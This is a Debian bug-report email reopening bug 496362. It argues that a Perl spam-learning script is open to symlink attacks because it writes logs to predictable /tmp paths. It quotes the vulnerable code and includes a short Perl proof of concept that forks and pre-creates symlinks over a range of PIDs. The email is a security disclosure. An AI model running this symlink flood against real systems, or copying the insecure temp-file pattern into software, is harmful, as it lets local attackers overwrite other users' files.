reopen 496362 thanks DBTS> Done as the mass-opening of symlink attack in /tmp was wrong in this case.
Why wrong?
{
my $ent = shift;
if ($ent->head->mime_type eq 'message/rfc822') {
if ($DEBUG) {
unlink "/tmp/spam.log.$$" if -e "/tmp/spam.log.$$";
open(OUT, "|$SA_LEARN -D --$spamham --single >>/tmp/spam.log.$$
2>&1") or die "Cannot pipe $SA_LEARN: $!";
} else {
open(OUT, "|$SA_LEARN --$spamham --single") or die "Cannot pipe
$SA_LEARN: $!";
}
$ent->bodyhandle->print(\*OUT);
--
die "$sender, I don't recognize your domain ($domain)!";
}
if ($DEBUG) {
MIME::Tools->debugging(1);
open(STDERR, ">/tmp/spam_err.log");
}
my $parser = new MIME::Parser;
$parser->extract_nested_messages(0);
$parser->output_under($UNPACK_DIR);
unlink tempfile before using is not guarantee form attack.
re-read bugreport, please:
DBTS> Even if you make rm(dir) for files/directories, then your system is
DBTS> not protected. Attacker can permanently create symlinks.
attacker can write script as:
#!perl
$file_for_attack='/path/to/file';
while(1)
{
exit unless fork;
symlink $file_for_attack, "/tmp/spam.log.$_" for ($$ .. $$+10000);
}
--
. ''`. Dmitry E. Oboukhov
: :’ : [EMAIL PROTECTED]
`. `~’ GPGKey: 1024D / F8E26537 2006-11-21
`- 1B23 D4F8 8EC0 D902 0555 E438 AB8C 00CF F8E2 6537
signature.asc
Description: Digital signature
